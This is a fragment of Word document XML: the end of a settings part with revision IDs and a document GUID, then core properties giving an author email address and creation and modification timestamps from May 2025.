    <w:rsid w:val="00FC0D5B"/>
    <w:rsid w:val="00FD6622"/>
    <w:rsid w:val="00F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43C79"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E1810A90-05AB-A14D-B2F4-4BBE248B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4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4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4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9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1254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try.minu09@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>try.minu09@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-16T10:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-16T10:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>